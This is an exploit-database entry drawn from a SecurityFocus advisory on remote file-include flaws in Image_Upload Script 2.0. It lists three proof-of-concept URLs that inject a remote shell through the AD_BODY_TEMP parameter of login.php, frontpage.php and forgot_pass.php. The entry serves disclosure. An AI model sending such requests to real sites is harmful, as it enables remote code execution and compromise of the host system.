source: http://www.securityfocus.com/bid/23132/info Image_Upload Script is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. Version 2.0 is vulnerable to these issues. http://www.example.com/imageupload_path/login.php?AD_BODY_TEMP=Shell? http://www.example.com/imageupload_path/frontpage.php?AD_BODY_TEMP=Shell? http://www.example.com/imageupload_path/forgot_pass.php?AD_BODY_TEMP=Shell?
Related ExploitsTrying to match OSVDBs (3): 105438, 105439, 105440
Other Possible E-DB Search Terms: Image_Upload Script 2.0, Image_Upload Script